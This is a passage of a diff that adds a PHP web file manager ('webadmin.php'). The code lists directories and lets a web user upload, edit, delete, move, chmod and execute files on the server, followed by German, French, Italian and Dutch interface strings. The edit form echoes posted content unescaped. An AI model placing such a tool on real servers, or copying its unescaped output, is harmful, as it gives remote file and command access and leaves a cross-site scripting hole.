+		<td style="text-align: right">' . word('read') . ':</td>
+		<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('write') . ':</td>
+		<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('execute') . ':</td>
+		<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	</table>
+
+	<hr />
+
+	<input type="submit" name="set" value="' . word('set') . '" />
+
+	<input type="hidden" name="action" value="permission" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+default:
+
+	listing_page();
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function getlist ($directory) {
+	global $delim, $win;
+
+	if ($d = @opendir($directory)) {
+
+		while (($filename = @readdir($d)) !== false) {
+
+			$path = $directory . $filename;
+
+			if ($stat = @lstat($path)) {
+
+				$file = array(
+					'filename'    => $filename,
+					'path'        => $path,
+					'is_file'     => @is_file($path),
+					'is_dir'      => @is_dir($path),
+					'is_link'     => @is_link($path),
+					'is_readable' => @is_readable($path),
+					'is_writable' => @is_writable($path),
+					'size'        => $stat['size'],
+					'permission'  => $stat['mode'],
+					'owner'       => $stat['uid'],
+					'group'       => $stat['gid'],
+					'mtime'       => @filemtime($path),
+					'atime'       => @fileatime($path),
+					'ctime'       => @filectime($path)
+				);
+
+				if ($file['is_dir']) {
+					$file['is_executable'] = @file_exists($path . $delim . '.');
+				} else {
+					if (!$win) {
+						$file['is_executable'] = @is_executable($path);
+					} else {
+						$file['is_executable'] = true;
+					}
+				}
+
+				if ($file['is_link']) $file['target'] = @readlink($path);
+
+				if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
+				if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));
+
+				$files[] = $file;
+
+			}
+
+		}
+
+		return $files;
+
+	} else {
+		return false;
+	}
+
+}
+
+function sortlist (&$list, $key, $reverse) {
+
+	quicksort($list, 0, sizeof($list) - 1, $key);
+
+	if ($reverse) $list = array_reverse($list);
+
+}
+
+function quicksort (&$array, $first, $last, $key) {
+
+	if ($first < $last) {
+
+		$cmp = $array[floor(($first + $last) / 2)][$key];
+
+		$l = $first;
+		$r = $last;
+
+		while ($l <= $r) {
+
+			while ($array[$l][$key] < $cmp) $l++;
+			while ($array[$r][$key] > $cmp) $r--;
+
+			if ($l <= $r) {
+
+				$tmp = $array[$l];
+				$array[$l] = $array[$r];
+				$array[$r] = $tmp;
+
+				$l++;
+				$r--;
+
+			}
+
+		}
+
+		quicksort($array, $first, $r, $key);
+		quicksort($array, $l, $last, $key);
+
+	}
+
+}
+
+function permission_octal2string ($mode) {
+
+	if (($mode & 0xC000) === 0xC000) {
+		$type = 's';
+	} elseif (($mode & 0xA000) === 0xA000) {
+		$type = 'l';
+	} elseif (($mode & 0x8000) === 0x8000) {
+		$type = '-';
+	} elseif (($mode & 0x6000) === 0x6000) {
+		$type = 'b';
+	} elseif (($mode & 0x4000) === 0x4000) {
+		$type = 'd';
+	} elseif (($mode & 0x2000) === 0x2000) {
+		$type = 'c';
+	} elseif (($mode & 0x1000) === 0x1000) {
+		$type = 'p';
+	} else {
+		$type = '?';
+	}
+
+	$owner  = ($mode & 00400) ? 'r' : '-';
+	$owner .= ($mode & 00200) ? 'w' : '-';
+	if ($mode & 0x800) {
+		$owner .= ($mode & 00100) ? 's' : 'S';
+	} else {
+		$owner .= ($mode & 00100) ? 'x' : '-';
+	}
+
+	$group  = ($mode & 00040) ? 'r' : '-';
+	$group .= ($mode & 00020) ? 'w' : '-';
+	if ($mode & 0x400) {
+		$group .= ($mode & 00010) ? 's' : 'S';
+	} else {
+		$group .= ($mode & 00010) ? 'x' : '-';
+	}
+
+	$other  = ($mode & 00004) ? 'r' : '-';
+	$other .= ($mode & 00002) ? 'w' : '-';
+	if ($mode & 0x200) {
+		$other .= ($mode & 00001) ? 't' : 'T';
+	} else {
+		$other .= ($mode & 00001) ? 'x' : '-';
+	}
+
+	return $type . $owner . $group . $other;
+
+}
+
+function is_script ($filename) {
+	return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
+}
+
+function getmimetype ($filename) {
+	static $mimes = array(
+		'\.jpg$|\.jpeg$'  => 'image/jpeg',
+		'\.gif$'          => 'image/gif',
+		'\.png$'          => 'image/png',
+		'\.html$|\.html$' => 'text/html',
+		'\.txt$|\.asc$'   => 'text/plain',
+		'\.xml$|\.xsl$'   => 'application/xml',
+		'\.pdf$'          => 'application/pdf'
+	);
+
+	foreach ($mimes as $regex => $mime) {
+		if (eregi($regex, $filename)) return $mime;
+	}
+
+	// return 'application/octet-stream';
+	return 'text/plain';
+
+}
+
+function del ($file) {
+	global $delim;
+
+	if (!@is_link($file) && !file_exists($file)) return false;
+
+	if (!@is_link($file) && @is_dir($file)) {
+
+		if ($dir = @opendir($file)) {
+
+			$error = false;
+
+			while (($f = readdir($dir)) !== false) {
+				if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
+					$error = true;
+				}
+			}
+			closedir($dir);
+
+			if (!$error) return @rmdir($file);
+
+			return !$error;
+
+		} else {
+			return false;
+		}
+
+	} else {
+		return @unlink($file);
+	}
+
+}
+
+function addslash ($directory) {
+	global $delim;
+
+	if (substr($directory, -1, 1) != $delim) {
+		return $directory . $delim;
+	} else {
+		return $directory;
+	}
+
+}
+
+function relative2absolute ($string, $directory) {
+
+	if (path_is_relative($string)) {
+		return simplify_path(addslash($directory) . $string);
+	} else {
+		return simplify_path($string);
+	}
+
+}
+
+function path_is_relative ($path) {
+	global $win;
+
+	if ($win) {
+		return (substr($path, 1, 1) != ':');
+	} else {
+		return (substr($path, 0, 1) != '/');
+	}
+
+}
+
+function absolute2relative ($directory, $target) {
+	global $delim;
+
+	$path = '';
+	while ($directory != $target) {
+		if ($directory == substr($target, 0, strlen($directory))) {
+			$path .= substr($target, strlen($directory));
+			break;
+		} else {
+			$path .= '..' . $delim;
+			$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
+		}
+	}
+	if ($path == '') $path = '.';
+
+	return $path;
+
+}
+
+function simplify_path ($path) {
+	global $delim;
+
+	if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
+		$path = realpath($path);
+		if (@is_dir($path)) {
+			return addslash($path);
+		} else {
+			return $path;
+		}
+	}
+
+	$pattern  = $delim . '.' . $delim;
+
+	if (@is_dir($path)) {
+		$path = addslash($path);
+	}
+
+	while (strpos($path, $pattern) !== false) {
+		$path = str_replace($pattern, $delim, $path);
+	}
+
+	$e = addslashes($delim);
+	$regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
+
+	while (ereg($regex, $path)) {
+		$path = ereg_replace($regex, $delim, $path);
+	}
+	
+	return $path;
+
+}
+
+function human_filesize ($filesize) {
+
+	$suffices = 'kMGTPE';
+
+	$n = 0;
+	while ($filesize >= 1000) {
+		$filesize /= 1024;
+		$n++;
+	}
+
+	$filesize = round($filesize, 3 - strpos($filesize, '.'));
+
+	if (strpos($filesize, '.') !== false) {
+		while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
+			$filesize = substr($filesize, 0, strlen($filesize) - 1);
+		}
+	}
+
+	$suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
+
+	return $filesize . " {$suffix}B";
+
+}
+
+function strip (&$str) {
+	$str = stripslashes($str);
+}
+
+/* ------------------------------------------------------------------------- */
+
+function listing_page ($message = null) {
+	global $self, $directory, $sort, $reverse;
+
+	html_header();
+
+	$list = getlist($directory);
+
+	if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
+	if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;
+
+	sortlist($list, $sort, $reverse);
+
+	echo '<h1 style="margin-bottom: 0">webadmin.php</h1>
+
+<form enctype="multipart/form-data" action="' . $self . '" method="post">
+
+<table id="main">
+';
+
+	directory_choice();
+
+	if (!empty($message)) {
+		spacer();
+		echo $message;
+	}
+
+	if (@is_writable($directory)) {
+		upload_box();
+		create_box();
+	} else {
+		spacer();
+	}
+
+	if ($list) {
+		listing($list);
+	} else {
+		echo error('not_readable', $directory);
+	}
+
+	echo '</table>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function listing ($list) {
+	global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
+
+	echo '<tr class="listing">
+	<th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
+';
+
+	$d = 'dir=' . urlencode($directory) . '&amp;';
+
+	if (!$reverse && $sort == 'filename') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n";
+
+	if (!$reverse && $sort == 'size') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n";
+
+	if (!$win) {
+
+		if (!$reverse && $sort == 'permission') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n";
+
+		if (!$reverse && $sort == 'owner') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n";
+
+		if (!$reverse && $sort == 'group') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n";
+
+	}
+
+	echo '	<th class="functions">' . word('functions') . '</th>
+</tr>
+';
+
+	for ($i = 0; $i < sizeof($list); $i++) {
+		$file = $list[$i];
+
+		$timestamps  = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
+		$timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
+		$timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
+
+		echo '<tr class="listing">
+	<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
+	<td class="filename" title="' . html($timestamps) . '">';
+
+		if ($file['is_link']) {
+
+			echo '<img src="' . $self . '?image=link" alt="link" /> ';
+			echo html($file['filename']) . ' &rarr; ';
+
+			$real_file = relative2absolute($file['target'], $directory);
+
+			if (@is_readable($real_file)) {
+				if (@is_dir($real_file)) {
+					echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
+				} else {
+					echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
+				}
+			} else {
+				echo html($file['target']);
+			}
+
+		} elseif ($file['is_dir']) {
+
+			echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
+			if ($win || $file['is_executable']) {
+				echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+			echo ' ]';
+
+		} else {
+
+			if (substr($file['filename'], 0, 1) == '.') {
+				echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
+			} else {
+				echo '<img src="' . $self . '?image=file" alt="file" /> ';
+			}
+
+			if ($file['is_file'] && $file['is_readable']) {
+			   echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+
+		}
+
+		if ($file['size'] >= 1000) {
+			$human = ' title="' . human_filesize($file['size']) . '"';
+		} else {
+			$human = '';
+		}
+
+		echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";
+
+		if (!$win) {
+
+			echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
+
+			$l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
+			if ($l) echo '<a href="' . $self . '?action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">';
+			echo html(permission_octal2string($file['permission']));
+			if ($l) echo '</a>';
+
+			echo "</td>\n";
+
+			if (array_key_exists('owner_name', $file)) {
+				echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
+			}
+
+			if (array_key_exists('group_name', $file)) {
+				echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"group\">{$file['group']}</td>\n";
+			}
+
+		}
+
+		echo '	<td class="functions">
+		<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
+';
+
+		$actions = array();
+		if (function_exists('symlink')) {
+			$actions[] = 'create_symlink';
+		}
+		if (@is_writable(dirname($file['path']))) {
+			$actions[] = 'delete';
+			$actions[] = 'rename';
+			$actions[] = 'move';
+		}
+		if ($file['is_file'] && $file['is_readable']) {
+			$actions[] = 'copy';
+			$actions[] = 'download';
+			if ($file['is_writable']) $actions[] = 'edit';
+		}
+		if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
+			$actions[] = 'execute';
+		}
+
+		if (sizeof($actions) > 0) {
+
+			echo '		<select class="small" name="action' . $i . '" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+			foreach ($actions as $action) {
+				echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+			}
+
+			echo '		</select>
+		<input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" />
+';
+
+		}
+
+		echo '	</td>
+</tr>
+';
+
+	}
+
+	echo '<tr class="listing_footer">
+	<td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt="&gt;" /></td>
+	<td colspan="' . ($cols - 1) . '">
+		<input type="hidden" name="num" value="' . sizeof($list) . '" />
+		<input type="hidden" name="focus" value="" />
+		<input type="hidden" name="olddir" value="' . html($directory) . '" />
+';
+
+	$actions = array();
+	if (@is_writable(dirname($file['path']))) {
+		$actions[] = 'delete';
+		$actions[] = 'move';
+	}
+	$actions[] = 'copy';
+
+	echo '		<select class="small" name="action_all" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+	foreach ($actions as $action) {
+		echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+	}
+
+	echo '		</select>
+		<input class="small" type="submit" name="submit_all" value=" &gt; " onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function directory_choice () {
+	global $directory, $homedir, $cols, $self;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="directory">
+		<a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
+		<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
+		<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
+	</td>
+</tr>
+';
+
+}
+
+function upload_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="upload">
+		' . word('file') . ':
+		<input type="file" name="upload" onfocus="activate(\'other\')" />
+		<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function create_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="create">
+		<select name="create_type" size="1" onfocus="activate(\'create\')">
+		<option value="file">' . word('file') . '</option>
+		<option value="directory">' . word('directory') . '</option>
+		</select>
+		<input type="text" name="create_name" onfocus="activate(\'create\')" />
+		<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
+	</td>
+</tr>
+';
+
+}
+
+function edit ($file) {
+	global $self, $directory, $editcols, $editrows, $apache, $htpasswd, $htaccess;
+
+	html_header();
+
+	echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
+
+<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<textarea name="content" cols="' . $editcols . '" rows="' . $editrows . '" WRAP="off">';
+
+	if (array_key_exists('content', $_POST)) {
+		echo $_POST['content'];
+	} else {
+		$f = fopen($file, 'r');
+		while (!feof($f)) {
+			echo html(fread($f, 8192));
+		}
+		fclose($f);
+	}
+
+	if (!empty($_POST['user'])) {
+		echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
+	}
+	if (!empty($_POST['basic_auth'])) {
+		if ($win) {
+			$authfile = str_replace('\\', '/', $directory) . $htpasswd;
+		} else {
+			$authfile = $directory . $htpasswd;
+		}
+		echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n";
+		echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n";
+		echo 'Require valid-user';
+	}
+
+	echo '</textarea>
+
+	<hr />
+';
+
+	if ($apache && basename($file) == $htpasswd) {
+		echo '
+	' . word('user') . ': <input type="text" name="user" />
+	' . word('password') . ': <input type="password" name="password" />
+	<input type="submit" value="' . word('add') . '" />
+
+	<hr />
+';
+
+	}
+
+	if ($apache && basename($file) == $htaccess) {
+		echo '
+	<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
+
+	<hr />
+';
+
+	}
+
+	echo '
+	<input type="hidden" name="action" value="edit" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<input type="reset" value="' . word('reset') . '" id="red_button" />
+	<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('back') . ' ]</a></p>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function spacer () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" style="height: 1em"></td>
+</tr>
+';
+
+}
+
+function textfieldsize ($content) {
+
+	$size = strlen($content) + 5;
+	if ($size < 30) $size = 30;
+
+	return $size;
+
+}
+
+function request_dump () {
+
+	foreach ($_REQUEST as $key => $value) {
+		echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
+	}
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function html ($string) {
+	global $site_charset;
+	return htmlentities($string, ENT_COMPAT, $site_charset);
+}
+
+function word ($word) {
+	global $words, $word_charset;
+	return htmlentities($words[$word], ENT_COMPAT, $word_charset);
+}
+
+function phrase ($phrase, $arguments) {
+	global $words;
+	static $search;
+
+	if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
+
+	for ($i = 0; $i < sizeof($arguments); $i++) {
+		$arguments[$i] = nl2br(html($arguments[$i]));
+	}
+
+	$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
+
+	return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
+
+}
+
+function getwords ($lang) {
+	global $word_charset, $date_format;
+
+	switch ($lang) {
+	case 'de':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Verzeichnis',
+'file' => 'Datei',
+'filename' => 'Dateiname',
+
+'size' => 'Gr��e',
+'permission' => 'Rechte',
+'owner' => 'Eigner',
+'group' => 'Gruppe',
+'other' => 'Andere',
+'functions' => 'Funktionen',
+
+'read' => 'lesen',
+'write' => 'schreiben',
+'execute' => 'ausf�hren',
+
+'create_symlink' => 'Symlink erstellen',
+'delete' => 'l�schen',
+'rename' => 'umbenennen',
+'move' => 'verschieben',
+'copy' => 'kopieren',
+'edit' => 'editieren',
+'download' => 'herunterladen',
+'upload' => 'hochladen',
+'create' => 'erstellen',
+'change' => 'wechseln',
+'save' => 'speichern',
+'set' => 'setze',
+'reset' => 'zur�cksetzen',
+'relative' => 'Pfad zum Ziel relativ',
+
+'yes' => 'Ja',
+'no' => 'Nein',
+'back' => 'zur�ck',
+'destination' => 'Ziel',
+'symlink' => 'Symbolischer Link',
+'no_output' => 'keine Ausgabe',
+
+'user' => 'Benutzername',
+'password' => 'Kennwort',
+'add' => 'hinzuf�gen',
+'add_basic_auth' => 'HTTP-Basic-Auth hinzuf�gen',
+
+'uploaded' => '"[%1]" wurde hochgeladen.',
+'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.',
+'already_exists' => '"[%1]" existiert bereits.',
+'created' => '"[%1]" wurde erstellt.',
+'not_created' => '"[%1]" konnte nicht erstellt werden.',
+'really_delete' => 'Sollen folgende Dateien wirklich gel�scht werden?',
+'deleted' => "Folgende Dateien wurden gel�scht:\n[%1]",
+'not_deleted' => "Folgende Dateien konnten nicht gel�scht werden:\n[%1]",
+'rename_file' => 'Benenne Datei um:',
+'renamed' => '"[%1]" wurde in "[%2]" umbenannt.',
+'not_renamed' => '"[%1] konnte nicht in "[%2]" umbenannt werden.',
+'move_files' => 'Verschieben folgende Dateien:',
+'moved' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]",
+'not_moved' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]",
+'copy_files' => 'Kopiere folgende Dateien:',
+'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]",
+'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]",
+'not_edited' => '"[%1]" kann nicht editiert werden.',
+'executed' => "\"[%1]\" wurde erfolgreich ausgef�hrt:\n{%2}",
+'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgef�hrt werden:\n{%2}",
+'saved' => '"[%1]" wurde gespeichert.',
+'not_saved' => '"[%1]" konnte nicht gespeichert werden.',
+'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.',
+'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.',
+'permission_for' => 'Rechte f�r "[%1]":',
+'permission_set' => 'Die Rechte f�r "[%1]" wurden auf [%2] gesetzt.',
+'permission_not_set' => 'Die Rechte f�r "[%1]" konnten nicht auf [%2] gesetzt werden.',
+'not_readable' => '"[%1]" kann nicht gelesen werden.'
+		);
+
+	case 'fr':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'R�pertoire',
+'file' => 'Fichier',
+'filename' => 'Nom fichier',
+
+'size' => 'Taille',
+'permission' => 'Droits',
+'owner' => 'Propri�taire',
+'group' => 'Groupe',
+'other' => 'Autres',
+'functions' => 'Fonctions',
+
+'read' => 'Lire',
+'write' => 'Ecrire',
+'execute' => 'Ex�cuter',
+
+'create_symlink' => 'Cr�er lien symbolique',
+'delete' => 'Effacer',
+'rename' => 'Renommer',
+'move' => 'D�placer',
+'copy' => 'Copier',
+'edit' => 'Ouvrir',
+'download' => 'T�l�charger sur PC',
+'upload' => 'T�l�charger sur serveur',
+'create' => 'Cr�er',
+'change' => 'Changer',
+'save' => 'Sauvegarder',
+'set' => 'Ex�cuter',
+'reset' => 'R�initialiser',
+'relative' => 'Relatif',
+
+'yes' => 'Oui',
+'no' => 'Non',
+'back' => 'Retour',
+'destination' => 'Destination',
+'symlink' => 'Lien symbollique',
+'no_output' => 'Pas de sortie',
+
+'user' => 'Utilisateur',
+'password' => 'Mot de passe',
+'add' => 'Ajouter',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" a �t� t�l�charg� sur le serveur.',
+'not_uploaded' => '"[%1]" n a pas �t� t�l�charg� sur le serveur.',
+'already_exists' => '"[%1]" existe d�j�.',
+'created' => '"[%1]" a �t� cr��.',
+'not_created' => '"[%1]" n a pas pu �tre cr��.',
+'really_delete' => 'Effacer le fichier?',
+'deleted' => "Ces fichiers ont �t� d�tuits:\n[%1]",
+'not_deleted' => "Ces fichiers n ont pu �tre d�truits:\n[%1]",
+'rename_file' => 'Renomme fichier:',
+'renamed' => '"[%1]" a �t� renomm� en "[%2]".',
+'not_renamed' => '"[%1] n a pas pu �tre renomm� en "[%2]".',
+'move_files' => 'D�placer ces fichiers:',
+'moved' => "Ces fichiers ont �t� d�plac�s en \"[%2]\":\n[%1]",
+'not_moved' => "Ces fichiers n ont pas pu �tre d�plac�s en \"[%2]\":\n[%1]",
+'copy_files' => 'Copier ces fichiers:',
+'copied' => "Ces fichiers ont �t� copi�s en \"[%2]\":\n[%1]",
+'not_copied' => "Ces fichiers n ont pas pu �tre copi�s en \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" ne peut �tre ouvert.',
+'executed' => "\"[%1]\" a �t� brillamment ex�cut� :\n{%2}",
+'not_executed' => "\"[%1]\" n a pas pu �tre ex�cut�:\n{%2}",
+'saved' => '"[%1]" a �t� sauvegard�.',
+'not_saved' => '"[%1]" n a pas pu �tre sauvegard�.',
+'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a �t� cr�e.',
+'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu �tre cr��.',
+'permission_for' => 'Droits de "[%1]":',
+'permission_set' => 'Droits de "[%1]" ont �t� chang�s en [%2].',
+'permission_not_set' => 'Droits de "[%1]" n ont pas pu �tre chang�s en[%2].',
+'not_readable' => '"[%1]" ne peut pas �tre ouvert.'
+		);
+
+	case 'it':
+
+		$date_format = 'd-m-Y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directory',
+'file' => 'File',
+'filename' => 'Nome File',
+
+'size' => 'Dimensioni',
+'permission' => 'Permessi',
+'owner' => 'Proprietario',
+'group' => 'Gruppo',
+'other' => 'Altro',
+'functions' => 'Funzioni',
+
+'read' => 'leggi',
+'write' => 'scrivi',
+'execute' => 'esegui',
+
+'create_symlink' => 'crea link simbolico',
+'delete' => 'cancella',
+'rename' => 'rinomina',
+'move' => 'sposta',
+'copy' => 'copia',
+'edit' => 'modifica',
+'download' => 'download',
+'upload' => 'upload',
+'create' => 'crea',
+'change' => 'cambia',
+'save' => 'salva',
+'set' => 'imposta',
+'reset' => 'reimposta',
+'relative' => 'Percorso relativo per la destinazione',
+
+'yes' => 'Si',
+'no' => 'No',
+'back' => 'indietro',
+'destination' => 'Destinazione',
+'symlink' => 'Link simbolico',
+'no_output' => 'no output',
+
+'user' => 'User',
+'password' => 'Password',
+'add' => 'aggiungi',
+'add_basic_auth' => 'aggiungi autenticazione base',
+
+'uploaded' => '"[%1]" � stato caricato.',
+'not_uploaded' => '"[%1]" non � stato caricato.',
+'already_exists' => '"[%1]" esiste gi�.',
+'created' => '"[%1]" � stato creato.',
+'not_created' => '"[%1]" non � stato creato.',
+'really_delete' => 'Cancello questi file ?',
+'deleted' => "Questi file sono stati cancellati:\n[%1]",
+'not_deleted' => "Questi file non possono essere cancellati:\n[%1]",
+'rename_file' => 'File rinominato:',
+'renamed' => '"[%1]" � stato rinominato in "[%2]".',
+'not_renamed' => '"[%1] non � stato rinominato in "[%2]".',
+'move_files' => 'Sposto questi file:',
+'moved' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
+'not_moved' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
+'copy_files' => 'Copio questi file',
+'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
+'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]",
+'not_edited' => '"[%1]" non pu� essere modificato.',
+'executed' => "\"[%1]\" � stato eseguito con successo:\n{%2}",
+'not_executed' => "\"[%1]\" non � stato eseguito con successo\n{%2}",
+'saved' => '"[%1]" � stato salvato.',
+'not_saved' => '"[%1]" non � stato salvato.',
+'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" � stato creato.',
+'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non � stato creato.',
+'permission_for' => 'Permessi di "[%1]":',
+'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].',
+'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].',
+'not_readable' => '"[%1]" non pu� essere letto.'
+		);
+
+	case 'nl':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directory',
+'file' => 'Bestand',
+'filename' => 'Bestandsnaam',
+
+'size' => 'Grootte',
+'permission' => 'Bevoegdheid',
+'owner' => 'Eigenaar',
+'group' => 'Groep',
+'other' => 'Anderen',
+'functions' => 'Functies',
+
+'read' => 'lezen',
+'write' => 'schrijven',
+'execute' => 'uitvoeren',
+
+'create_symlink' => 'maak symlink',
